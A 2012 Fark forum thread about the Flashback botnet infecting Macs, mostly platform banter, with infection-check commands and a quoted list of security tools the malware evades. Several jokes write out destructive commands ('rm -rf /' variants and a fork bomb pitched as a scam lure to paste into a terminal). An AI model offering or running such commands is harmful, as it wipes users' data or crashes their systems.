
(C|Net)   OSX Flashback Botnet infections rise to over 600,000   (news.cnet.com)
    More: Followup, OSX Flashback Botnet, flashback, botnets, malware, Macintosh

2666 clicks; posted to Geek » on 05 Apr 2012 at 10:42 AM (2 years ago)



 
2012-04-05 10:47:56 AM
(snicker)
 
2012-04-05 10:51:43 AM
images.wikia.com
 
2012-04-05 10:53:20 AM
For purposes of this thread, I hereby define push as:

*just visiting* an infected site with no user interaction required*

/I know that's not technically true, but there's a difference to most users between "I download funny_cat_vid.exe, click on it, provide it my password, and THEN stuff happens", and "I visit a site with an infected ad, and stuff happens"
//If you don't get why I'm doing this, read the last thread.
 
2012-04-05 10:53:41 AM
Impossible. Only people that grant permissions get viruses on Macs. And only the most brilliant minds buy Apple products.
 
2012-04-05 10:58:44 AM

meyerkev: For purposes of this thread, I hereby define push as:

*just visiting* an infected site with no additional user interaction required after 'just visiting' the site*


FTFY. ;)

And sure, feel free to define it that way... just note that you can't then compare it to real push-distributed viruses and worms.

/I hereby define "apples" as orange-colored citrus fruits with a tough rind, white pith, and juice-filled flesh.
 
2012-04-05 11:05:48 AM
Throwing this out there, I have never met a mac user (this includes professionals) who's computer wasn't lousy with spyware, malware, and viruses. They have this "it can't happen to me" mantra and they learn eventually this isn't true.

To be fair, the solution provided for almost every problem is "bring it in and let them figure it out", which basically is a format and fresh reinstall most of the time.

I'm not anti-mac, they're shiny plastic cases filled with an intel infrastructure no different than a p.c. The culture of the mac is what's rotten.

/just sayin'
//get a decent box and dual boot at least.
///Just know what you're doing ffs.
 
2012-04-05 11:11:27 AM
Researcher, if you want to see something even scarier try fixing a Windows machine used by someone who has switched over from Macs or normally uses Macs.

The problem is a lack of security knowledge amongst most computer users and every person who doesn't use safe practices makes it worse for everyone.
 
2012-04-05 11:13:38 AM

meyerkev: For purposes of this thread, I hereby define push as:

*just visiting* an infected site with no user interaction required*

/I know that's not technically true, but there's a difference to most users between "I download funny_cat_vid.exe, click on it, provide it my password, and THEN stuff happens", and "I visit a site with an infected ad, and stuff happens"
//If you don't get why I'm doing this, read the last thread.


From F-secure:

Installation:
On execution, the malware checks if the following path exists in the system:

/Library/Little Snitch
/Developer/Applications/Xcode.app/Contents/MacOS/Xcode
/Applications/VirusBarrier X6.app
/Applications/iAntiVirus/iAntiVirus.app
/Applications/avast!.app
/Applications/ClamXav.app
/Applications/HTTPScoop.app
/Applications/Packet Peeper.app
If any of these are found, the malware will skip the rest of its routine and proceed to delete itself.

So it deletes itself if you have little snitch or any antivirus software. Isn't that the most considerate malware ever.
 
2012-04-05 11:15:32 AM
oh, wait, I thought all you Apple fanboys touted how secure they were? 600000 computers when apple has a marginal market share is huge, I wonder what percentage that is.
 
2012-04-05 11:15:45 AM

Researcher: Throwing this out there, I have never met a mac user (this includes professionals) who's computer wasn't lousy with spyware, malware, and viruses.


Authorized Apple Fan Site #115 recently did a poll on this, asking users who they thought was more educated about computers. Mac won in a landslide. I'm taking their opinion over yours.
 
2012-04-05 11:15:52 AM
It does that in an attempt to hide.

This seems like a test run of a later loaded package. Most likely snooping for bank info and the like.
 
2012-04-05 11:21:14 AM
Yawwwwn...
 
2012-04-05 11:21:26 AM
Mac's don't get Viruses.. they get Cancer.

Too soon?
 
2012-04-05 11:21:34 AM
And the folks on MacRumors.com laughed when I told them I installed ClamXav. Who's laughing now, morans?
 
2012-04-05 11:22:04 AM

Researcher: Throwing this out there, I have never met a mac user (this includes professionals) who's computer wasn't lousy with spyware, malware, and viruses. They have this "it can't happen to me" mantra and they learn eventually this isn't true.


You have never met a Mac user? There are still no Mac OSX viruses in the wild. As for the rest, maybe you shouldn't be hanging out with tweens.

/Seriously, my nephews completely destroyed my brother's old eMac. Unsupervised kids can destroy anything.
 
2012-04-05 11:27:33 AM

liverpoolumd: Mac's don't get Viruses.. they get Cancer.

Too soon?


Very offensive. When Steve Jobs died for our sins, he promised salvation for all of his computers. Those that choose to follow the one true Personal Computer will be rewarded with a life free of "viruses". Those who worship false idols will pay in the fiery pits of Windows NT.

Show some respect to your betters.
 
2012-04-05 11:28:17 AM
Just installed and ran AV on my Mac and the only thing it found was a Windows trojan attached to an email in my gmail spam folder in mail.app.
 
2012-04-05 11:29:29 AM

cman: And the folks on MacRumors.com laughed when I told them I installed ClamXav. Who's laughing now, morans?


Eh, the people at MacRumors are 'traded anyway.
 
2012-04-05 11:29:58 AM

The_Phantom: Just installed and ran AV on my Mac and the only thing it found was a Windows trojan attached to an email in my gmail spam folder in mail.app.


Bullshiat. Researcher just said that he's never met a Mac user who is computer wasn't lousy with spyware, malware, and viruses, so you must be lying. And a computer, apparently.
 
2012-04-05 11:34:26 AM
Since that site is about as clear as mud, I'll put it simple. Type or copy-and-paste:

defaults read /Applications/Safari.app/Contents/Info LSEnvironment

into a Terminal Window. If you get

"The domain/default pair of (/Applications/Safari.app/Contents/Info, LSEnvironment) does not exist"

then type in:

defaults read ~/.MacOSX/environment DYLD_INSERT_LIBRARIES

If you get something similar to:

"The domain/default pair of (/Users/joe/.MacOSX/environment, DYLD_INSERT_LIBRARIES) does not exist"

Then you're clean. If not on either case, follow the web page's instructions.

/shockingly, I'm clean. But then again, I don't give my admin password out willy-nilly.
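
The two manual checks in the comment above, wrapped in a script (an added example, not part of the original thread). It assumes `defaults read` exits non-zero for a missing key and, going slightly beyond the manual steps, always checks both keys; the function names are this example's own.

```shell
#!/bin/sh
# Added example: wraps the two `defaults read` checks from the comment above.
# Relies on `defaults read` exiting non-zero when the domain/key pair does
# not exist (the "does not exist" message quoted in the comment).

# check_key DOMAIN KEY
# Returns 0 if the key is absent (expected on a clean system),
# 1 if it is set (prints the value so it can be inspected).
check_key() {
    domain=$1
    key=$2
    if value=$(defaults read "$domain" "$key" 2>/dev/null); then
        printf 'SUSPECT  %s %s = %s\n' "$domain" "$key" "$value"
        return 1
    fi
    printf 'ok       %s %s is not set\n' "$domain" "$key"
    return 0
}

# flashback_check
# Returns 0 = both keys absent, 1 = at least one key set, 2 = cannot check.
flashback_check() {
    if ! command -v defaults >/dev/null 2>&1; then
        echo "defaults(1) not found; this check only works on OS X" >&2
        return 2
    fi
    rc=0
    # Unlike the manual steps, both keys are always checked and reported.
    check_key /Applications/Safari.app/Contents/Info LSEnvironment || rc=1
    check_key "$HOME/.MacOSX/environment" DYLD_INSERT_LIBRARIES || rc=1
    return "$rc"
}

# Run the check only on OS X (Darwin); elsewhere just define the functions.
if [ "$(uname -s)" = "Darwin" ]; then
    flashback_check
    case $? in
        0) echo "Both keys absent: clean by this test." ;;
        1) echo "A key is set: follow the removal instructions." ;;
    esac
fi
```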
 
2012-04-05 11:36:14 AM

xxcorydxx: oh, wait, I thought all you Apple fanboys touted how secure they were?


It's more secure than Windows, but probably less secure than Linux. Nothing earth-shattering about that opinion.
 
2012-04-05 11:36:28 AM

Theaetetus: Bullshiat. Researcher just said that he's never met a Mac user who is computer wasn't lousy with spyware, malware, and viruses, so you must be lying. And a computer, apparently.


You're missing an important qualifier. He's never MET one.
 
2012-04-05 11:36:52 AM

Theaetetus: The_Phantom: Just installed and ran AV on my Mac and the only thing it found was a Windows trojan attached to an email in my gmail spam folder in mail.app.

Bullshiat. Researcher just said that he's never met a Mac user who is computer wasn't lousy with spyware, malware, and viruses, so you must be lying. And a computer, apparently.


What makes you think those two have ever met?
 
2012-04-05 11:37:32 AM
Is this the other thread where we pretend a security flaw in Oracle's Java is all Apple's fault?
 
2012-04-05 11:45:34 AM
It's funny cuz I'm running Linux. THEY can't get viruses.
 
2012-04-05 11:47:09 AM

Theaetetus: The_Phantom: Just installed and ran AV on my Mac and the only thing it found was a Windows trojan attached to an email in my gmail spam folder in mail.app.

Bullshiat. Researcher just said that he's never met a Mac user who is computer wasn't lousy with spyware, malware, and viruses, so you must be lying. And a computer, apparently.


Yeah... I've never seen a Mac that was completely taken over by malware like I've seen Windows systems that have been completely compromised. I watched a completely updated Windows 7 system with MS Security Essentials be infected through a PDF file that opened by just visiting a seemingly benign website. FakeAV all over the place. Granted that was a vulnerability through Adobe Acrobat, it was still impressive.

I guess it's possible for that to happen in OS X, but I think a user would have to go out of their way to make that happen.
 
2012-04-05 11:53:44 AM
Apple did the right thing by dropping most backwards compatibility with OSX. Something they simply could not have done if they'd had the same market share that Microsoft does in the business world.

Windows will always be hobbled by the necessity to support legacy software. If Macs become too popular in corporate environments they will suffer the same issue.
 
2012-04-05 11:55:21 AM

Fubini: It's funny cuz I'm running Linux. THEY can't get viruses.


www.myfacewhen.net
 
2012-04-05 11:59:12 AM

Fubini: It's funny cuz I'm running Linux. THEY can't get viruses.


Nah. They can, but the cleanup process is super easy. RM -rf /
 
2012-04-05 12:06:08 PM
More than half a million Macs are infected with the Flashback Trojan, a malware package designed to steal personal information, according to a Russian antivirus company.

well, i'm sold.
 
2012-04-05 12:07:25 PM

fluffy2097: Fubini: It's funny cuz I'm running Linux. THEY can't get viruses.

Nah. They can, but the cleanup process is super easy. RM -rf /


That can leave some spots, or should I say dots.

Try rm -rf /; rm -rf /.*
 
2012-04-05 12:33:16 PM

Nix Nightbird: (snicker)


(chortle)
 
2012-04-05 12:34:25 PM

Fubini: It's funny cuz I'm running Linux. THEY can't get viruses.


Your penis is small, not pleasing lady! Open terminal and run this :(){ :|:& };:
your penis become huge like elephant, please all lady all time.
 
2012-04-05 12:34:31 PM

Researcher: Throwing this out there, I have never met a mac user (this includes professionals) who's computer wasn't lousy with spyware, malware, and viruses.


Bullshiat
 
2012-04-05 01:01:04 PM

BullBearMS: Is this the other thread where we pretend a security flaw in Oracle's Java is all Apple's fault?


Part of the problem is that Apple insists on pushing out its own patches, so Oracle has to go through Apple, which delayed the update going out.

/it's been out for a while now
 
2012-04-05 01:08:55 PM

mccallcl: It's more secure than Windows


for certain versions of windows which are older than OS/X...
 
2012-04-05 01:15:16 PM

fluffy2097: Fubini: It's funny cuz I'm running Linux. THEY can't get viruses.

Nah. They can, but the cleanup process is super easy. RM -rf /

sudo

rm -rf /

If you're cruising around as root in normal usage, you almost deserved it.
 
2012-04-05 01:17:15 PM

ProfessorOhki:
If you're cruising around as root in normal usage, you almost deserved it.


Same as a 'Bash Bomb' really.
 
2012-04-05 01:17:48 PM
I run Sophos AV on my MacBook Pro, and have since day one. I've never bought into the school of thought that Macs were immune to viruses.
 
2012-04-05 02:13:29 PM

Abe Vigoda's Ghost: I run Sophos AV on my MacBook Pro, and have since day one. I've never bought into the school of thought that Macs were immune to viruses.


I've been using some kind of AV software (and LittleSnitch) since 2003.

Have never run into a virus that could have installed itself on my system (although I've come across some compromised files via email that would have affected Windows users), although obviously no computer is safe. A little common sense goes a long way for an average user. Mostly common sense involving not downloading that "100% free cracked Adobe CS5" torrent at TPB.

If you're a user who has proximity to industrial and/or government information, security sh*t gets a lot realer.
 
2012-04-05 02:14:26 PM

ProfessorOhki: If you're cruising around as root in normal usage, you almost deserved it.


Sorry. I haven't used that command since I last installed Debian years ago.

It was amazing to watch XFree86 pull the plug and play data for my monitor, look at it, throw it into a log file and say "no screens found"

/My time is worth more than fixing garbage like that. I like something less reliable but easier to repair that would result in less total work for me.
 
2012-04-05 02:19:27 PM

Carth: meyerkev: For purposes of this thread, I hereby define push as:

*just visiting* an infected site with no user interaction required*

/I know that's not technically true, but there's a difference to most users between "I download funny_cat_vid.exe, click on it, provide it my password, and THEN stuff happens", and "I visit a site with an infected ad, and stuff happens"
//If you don't get why I'm doing this, read the last thread.

From F-secure:

Installation:
On execution, the malware checks if the following path exists in the system:

/Library/Little Snitch
/Developer/Applications/Xcode.app/Contents/MacOS/Xcode
/Applications/VirusBarrier X6.app
/Applications/iAntiVirus/iAntiVirus.app
/Applications/avast!.app
/Applications/ClamXav.app
/Applications/HTTPScoop.app
/Applications/Packet Peeper.app
If any of these are found, the malware will skip the rest of its routine and proceed to delete itself.

So it deletes itself if you have little snitch or any antivirus software. Isn't that the most considerate malware ever.



Not only that, but if you don't have one of the above, you have to give it permission to download. If you don't give permission, having Microsoft Office 2008 or 2011 will prevent the virus from installing.

So just by having Xcode you are immune; by having MS Office 2008 you are immune as long as you don't grant permission.
 
2012-04-05 02:26:06 PM

syberpud: BullBearMS: Is this the other thread where we pretend a security flaw in Oracle's Java is all Apple's fault?

Part of the problem is that Apple insists on pushing out its own patches, so Oracle has to go through Apple, which delayed the update going out.


Actually, Apple wanted Sun to assume responsibility for Java on the Mac back when they assumed responsibility for Java on Windows.

However, it wasn't until 2010, after the purchase by Oracle, that they finally agreed to assume responsibility for Java going forward.
 
2012-04-05 02:39:16 PM
So, you have to install it and give it permission? Why would you do that?
 
2012-04-05 03:10:02 PM

Researcher: Throwing this out there, I have never met a mac user (this includes professionals) who's computer wasn't lousy with spyware, malware, and viruses.


You're flinging poo

As a full time mac tech and now part time, I used to come across any of the above in about 1 in 100 macs from 1998 to 2002. Since then I have not seen more than a handful of cases of spyware (no, cookies don't count) let alone a trojan or a virus.

I have personally had one trojan in 18 years of heavy internet use, and that happened in 1997. It was an applescript that I foolishly double clicked, so shame on me.
 
2012-04-05 03:34:27 PM
I'm a little disappointed that I don't have it. It would validate my paranoia that someone is messing with my computer.
 
2012-04-05 03:39:58 PM

noit: I'm a little disappointed that I don't have it. It would validate my paranoia that someone is messing with my computer.


that's you.
 
2012-04-05 03:50:26 PM

andersoncouncil42: As a full time mac tech and now part time, I used to come across any of the above in about 1 in 100 macs from 1998 to 2002. Since then I have not seen more than a handful of cases of spyware (no, cookies don't count) let alone a trojan or a virus.

I have personally had one trojan in 18 years of heavy internet use, and that happened in 1997. It was an applescript that I foolishly double clicked, so shame on me.


Currently, I hold ACMT, ACSP, ACTC and a bunch of others. I second this statement. I will, however, go a step beyond and say Researcher is a farking liar. Having been a tech of one form or another working on Macs since 1984, I have seen exactly 1 infected Mac in that nearly 28 year history. I don't know how many thousands, perhaps tens of thousands of Macs I have repaired in that time. So yes, for all practical purposes Macs are proof.

Yes, any computer CAN be brought down under the right conditions. It just hasn't been my experience that the average, right-out-of-the-box Mac can be without the user doing something stupid right before all holy hell breaks loose. It's also why I also call bullshiat on the "Hack a Mac challenge" when they are connected to the computer being breached by a three-foot crossover cable. If I can physically touch that computer, I *WILL* pwn it, and no mad h4x0r skillz will be needed. Let me put that Mac behind the average cable modem on the other side of the country and see you 'hax' into it. I have yet to see any documented proof it can be.

So, yeah. I call bullshiat on "Researcher", too.
 
2012-04-05 03:52:06 PM

dready zim: noit: I'm a little disappointed that I don't have it. It would validate my paranoia that someone is messing with my computer.

that's you.


I know, but I was hoping it was a nefarious specter causing my browser to lock up, and not that I've installed and deleted so many programs over the years I don't know what's going on anymore.
 
2012-04-05 04:08:31 PM

1macgeek: Yes, any computer CAN be brought down under the right conditions. It just hasn't been my experience that the average, right-out-of-the-box Mac can be without the user doing something stupid right before all holy hell breaks loose. It's also why I also call bullshiat on the "Hack a Mac challenge" when they are connected to the computer being breached by a three-foot crossover cable. If I can physically touch that computer, I *WILL* pwn it, and no mad h4x0r skillz will be needed. Let me put that Mac behind the average cable modem on the other side of the country and see you 'hax' into it. I have yet to see any documented proof it can be.


Why would you think the security of the network devices has any bearing on the security of the PC? The challenge was to hack a mac, not hack a router. The fact that you said a modem, rather than a router when modems provide almost nothing security-wise compared to your off-the-shelf router is pretty indicative that either 1) You're full of crap. 2) Apple will certify just about anyone.

"I've never seen anyone break into this brand of car."
*breaks into car*
"Well yeah, sure it was just sitting there. I meant that if you put this car in an all-steel garage with guard dogs, a sniper nest, and a state-of-the-art security system that you couldn't break into the car. That just shows how good the car is!"
 
Displayed 50 of 105 comments
